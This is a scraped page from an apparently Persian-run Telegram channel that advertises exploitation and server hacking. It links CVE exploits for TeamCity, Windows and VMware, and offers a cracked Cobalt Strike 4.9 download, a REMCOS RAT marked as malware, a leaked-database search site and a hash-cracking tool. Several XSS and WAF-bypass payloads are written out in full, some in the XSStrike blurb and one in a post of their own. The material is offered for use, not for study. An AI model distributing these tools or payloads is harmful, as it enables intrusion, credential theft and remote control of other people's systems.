0Day.Today | Learn Exploit | Zero World | Dark web |
20.5K subscribers
1.25K photos
133 videos
491 files
1.3K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
CVE-2023-42793 - Authentication Bypass in JetBrains TeamCity CI/CD

Github

#Bypass #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3
CVE-2023-28229 - Windows CNG KeyIso RPC EoP/SBX

Github

#redteam #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
👎2
Using silent SMS to localize LTE users

Read

#SMS #LTEsniffer
——————
0Day.Today
@LearnExploit
@Tech_Army
👍92❤‍🔥1👎1🔥1
خیلیاتون مشکل VPN دارین یا دنبال VPN های پولی این اکثرا همه سرویس ها روی ipv6 ( آی پی ورژن 6 ) بالا میان مثل وارپ و ...... حتما امتحان کنین نتیجه میده اگرم دنبال Key وارپین از باتی که میزارم این زیر استفاده کنین . ( خودم رو ایرانسل جواب گرفتم اگر شما ام با همراه یا رایتل جواب گرفتین همین زیر بگین ❤️ )

Generate 12 PB Warp keys

#VPN
——————
0Day.Today
@LearnExploit
@Tech_Army
31🫡1
دانلود منیجر persepolis ساخته علیرضا امیرصمیمی که تقریبا آپدیتش قدیمی شده و آپدیتی براش منتشر نشده , حالا شخصی اومده و این دانلود منیجر رو با اسم Ghermez توسعه داده و شما برای سیستم عامل هاتون ( لینوکس , مک و ویندوز ) میتونین اونو دانلود کنین و استفاده کنید .

Ghermez

#Tools #ایرانی
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👎11👍62❤‍🔥1
Cobalt Strike 4.9.zip
74.6 MB
Cobalt Strike 4.9 cracked version 🔥🆕


#Tools #leak #Red_Team
——————‌
0Day.Today
@LearnExploit
@Tech_Army
🔥1421👎1
database search

search.0t.rocks

#db
——————‌
0Day.Today
@LearnExploit
@Tech_Army
5❤‍🔥11
CVE-2023-37988 - Wordpress/Plugin - Contact Form Generator [RXSS]

Github

#CVE #Wordpress #RXSS
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍3
SSRF King - SSRF plugin for burp Automates SSRF

Github

#plugin #Burpsuite
——————‌
0Day.Today
@LearnExploit
@Tech_Army
🔥6❤‍🔥3👍2
CVE-2023-34039-main.zip
126.9 KB
VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)

#CVE #RCE
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍3
🌟 REMCOS RAT🌟

⬇️ Download

bugcod3

#rat #windows #malware

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9👎31
CISSP Cert Prep

Download

#download
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍52
ابزار Shuck ابزاری برای کرک hash با دیتابیس HIBP

Shuck.sh

#hash
——————‌
0Day.Today
@LearnExploit
@Tech_Army
81👍1🔥1
🌟 XSStrike 🌟

Advanced XSS Detection Suite

📝
XSStrike is a Cross Site Scripting detection suite equipped with four hand written parsers, an intelligent payload generator, a powerful fuzzing engine and an incredibly fast crawler.

Instead of injecting payloads and checking it works like all the other tools do, XSStrike analyses the response with multiple parsers and then crafts payloads that are guaranteed to work by context analysis integrated with a fuzzing engine. Here are some examples of the payloads generated by XSStrike:
}]};(confirm)()//\
<A%0aONMouseOvER%0d=%0d[8].find(confirm)>z
</tiTlE/><a%0donpOintErentER%0d=%0d(prompt)``>z
</SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()//

Apart from that, XSStrike has crawling, fuzzing, parameter discovery, WAF detection capabilities as well. It also scans for DOM XSS vulnerabilities.

Main Features
⚪️Reflected and DOM XSS scanning
⚪️Multi-threaded crawling
⚪️Context analysis
⚪️Configurable core
⚪️WAF detection & evasion
⚪️Outdated JS lib scanning
⚪️Intelligent payload generator
⚪️Handmade HTML & JavaScript parser
⚪️Powerful fuzzing engine
⚪️Blind XSS support
⚪️Highly researched work-flow
⚪️Complete HTTP support
⚪️Bruteforce payloads from a file
⚪️Payload Encoding

⬇️ Download
😸 Github

bugcod3

#XSS #Scanner #Exploit #Python

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
👍92❤‍🔥1
Xss Bypass Waf

&lt;details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//

#bypass #waf
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍10👎1
🌟 Arjun 🌟

HTTP Parameter Discovery Suite

👁 What's Arjun?

Arjun can find query parameters for URL endpoints. If you don't get what that means, it's okay, read along.

Web applications use parameters (or queries) to accept user input, take the following example into consideration

http://api.example.com/v1/userinfo?id=751634589

This URL seems to load user information for a specific user id, but what if there exists a parameter named admin which when set to True makes the endpoint provide more information about the user?
This is what Arjun does, it finds valid HTTP parameters with a huge default dictionary of 25,890 parameter names.

The best part? It takes less than 10 seconds to go through this huge list while making just 50-60 requests to the target. Here's how

Why Arjun?
🔻Supports GET/POST/POST-JSON/POST-XML requests
🔻Automatically handles rate limits and timeouts
🔻Export results to: BurpSuite, text or JSON file
🔻Import targets from: BurpSuite, text file or a raw request file
🔻Can passively extract parameters from JS or 3 external sources


◀️ Installing Arjun
You can install arjun with pip as following:

➜ ~ pip3 install arjun

or, by downloading this repository and running

➜ ~ python3 setup.py install

⬇️ Download
😸 Github

BugCod3

#Recon #Api #Testing #Fuzzer #Fuzzing

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥4👎1